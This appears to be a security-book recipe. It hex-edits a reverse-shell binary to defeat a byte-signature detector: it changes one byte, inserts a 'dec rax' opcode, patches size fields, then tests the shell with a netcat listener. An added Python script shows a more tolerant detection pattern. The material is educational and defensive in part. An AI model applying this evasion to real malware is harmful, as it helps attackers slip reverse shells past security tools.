How to do it...

To change the binary's signature, use the following steps.

  1. Run the following command in the Terminal session:
     $ hexedit ch09-revshell64-modified
  2. Find the bytes 48 83 C0 3B at the end of 000000FC and use the arrow keys on the keyboard to move the cursor over the last byte, 3B.
     The memory addresses in this recipe may be different on your system, so keep that in mind.
  3. Change the last byte from 3B to 3C.
  4. Press the F2 key on the keyboard to save this change.
  5. Make sure the cursor is on 0F, which it should be after step 3.
  6. Press the Ctrl + spacebar keys on your keyboard to begin marking the hexadecimal.
  7. Use the down arrow key to highlight the rest of the hexadecimal in the file.
  8. Press Esc + W on your keyboard to copy the highlighted hexadecimal.
  9. Next, we need to inject the opcode for the dec rax instruction, which is 48 FF C8. This means we will overwrite the bytes 0F 05 00.
  10. With the cursor over 0F, type 48 FF C8 on your keyboard.
  11. Next, press F2 to save it.
  12. The cursor should now be on line 00000120 on the third byte, 00. Press Ctrl + Y to paste the copied bytes from step 8.
  13. Press F2 on the keyboard to save these changes.
  14. Now, we need to extend the size attributes in two locations, since we've added 3 bytes to the overall file. First, navigate the cursor to line 00000024 using the arrow keys on the keyboard.
  15. The fifth byte in that line should be 20. Change it to 23 and then press F2 to save your changes.
  16. Next, we need to lengthen the size of the .text section of the file. Navigate the cursor to line 00000264 and find the A1 byte located in the second-to-last column of bytes in that row.
  17. Using your keyboard, change A1 to A4, and then press F2 to save your changes.
  18. Press F10 on your keyboard to exit hexedit.
  19. Next, verify that this worked by typing the following in the Terminal session:
     $ objdump -d -M intel ch09-revshell64-modified
  20. Open another Terminal tab by pressing Ctrl + Shift + T on the keyboard.
  21. Start a netcat listener in the new Terminal tab by typing the following:
     $ nc -lnvp 31337
  22. Return to the original Terminal tab and run the modified binary. Review the netcat Terminal tab to make sure it runs correctly:
     $ ./ch09-revshell64-modified
  23. In the netcat Terminal tab, type the following:
     $ exit
  24. Finally, back in the other Terminal tab, we test to see whether our signature evasion worked. Run the following in the original Terminal session:
     $ ./sigDetect.py ch09-revshell64-modified
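The steps above show why an exact byte signature on the stub `add rax, 0x3B ; syscall` stops matching once one byte is changed and a `dec rax` is inserted. The following Python script is an added, detection-side illustration and is not code from the book or its `sigDetect.py`. It uses two short constructed byte sequences (the recipe's bytes padded with NOPs, not the actual binary) and compares a byte-for-byte signature with a tolerant check that folds any run of `inc rax`/`dec rax` back into the immediate, so the detector reasons about the syscall number actually placed in `rax` rather than the literal bytes. Function names and the 0x00-0x7F immediate range are this example's own assumptions.

```python
import re
from typing import List

# Constructed sample byte sequences for illustration (not the book's binary):
# the original "add rax, 0x3b ; syscall" stub and the patched
# "add rax, 0x3c ; dec rax ; syscall" stub, each padded with NOPs (0x90).
ORIGINAL_STUB = bytes.fromhex("9090" "4883c03b" "0f05" "9090")
PATCHED_STUB = bytes.fromhex("9090" "4883c03c" "48ffc8" "0f05" "9090")

# A naive signature: the exact bytes of "add rax, 0x3b ; syscall".
EXACT_SIGNATURE = bytes.fromhex("4883c03b0f05")


def exact_signature_hit(blob: bytes) -> bool:
    """Byte-for-byte match. One changed byte or one inserted instruction defeats it."""
    return EXACT_SIGNATURE in blob


# Tolerant pattern: "add rax, imm8" (48 83 C0 ib, imm8 restricted here to the
# non-negative range 0x00-0x7F), then any run of "inc rax" (48 FF C0) or
# "dec rax" (48 FF C8), then "syscall" (0F 05). Using re.DOTALL so that
# 0x0A bytes inside the pattern are treated like any other byte.
_SYSCALL_STUB = re.compile(
    rb"\x48\x83\xc0(?P<imm>[\x00-\x7f])(?P<adj>(?:\x48\xff[\xc0\xc8])*)\x0f\x05",
    re.DOTALL,
)


def effective_syscall_numbers(blob: bytes) -> List[int]:
    """Return the syscall number each matched stub ends up passing in rax."""
    results = []
    for m in _SYSCALL_STUB.finditer(blob):
        number = m.group("imm")[0]          # the imm8 operand as an int
        adjustments = m.group("adj")        # zero or more 3-byte inc/dec opcodes
        for i in range(0, len(adjustments), 3):
            # third byte of each group: 0xC0 = inc rax (+1), 0xC8 = dec rax (-1)
            number += 1 if adjustments[i + 2] == 0xC0 else -1
        results.append(number)
    return results


def flags_execve_stub(blob: bytes) -> bool:
    """True when any matched stub resolves to syscall 59 (execve on x86-64 Linux)."""
    return 59 in effective_syscall_numbers(blob)


if __name__ == "__main__":
    for name, blob in (("original", ORIGINAL_STUB), ("patched", PATCHED_STUB)):
        print(name, "exact signature:", exact_signature_hit(blob),
              "effective syscall numbers:", effective_syscall_numbers(blob))
```

The exact signature hits only the original stub, while the tolerant check resolves both stubs to syscall 59. The general lesson for anyone writing detections is to match on what the code does (here, the syscall number that reaches `rax`) rather than on a fixed byte string, because a single-byte edit of the kind performed in this recipe is enough to break the latter.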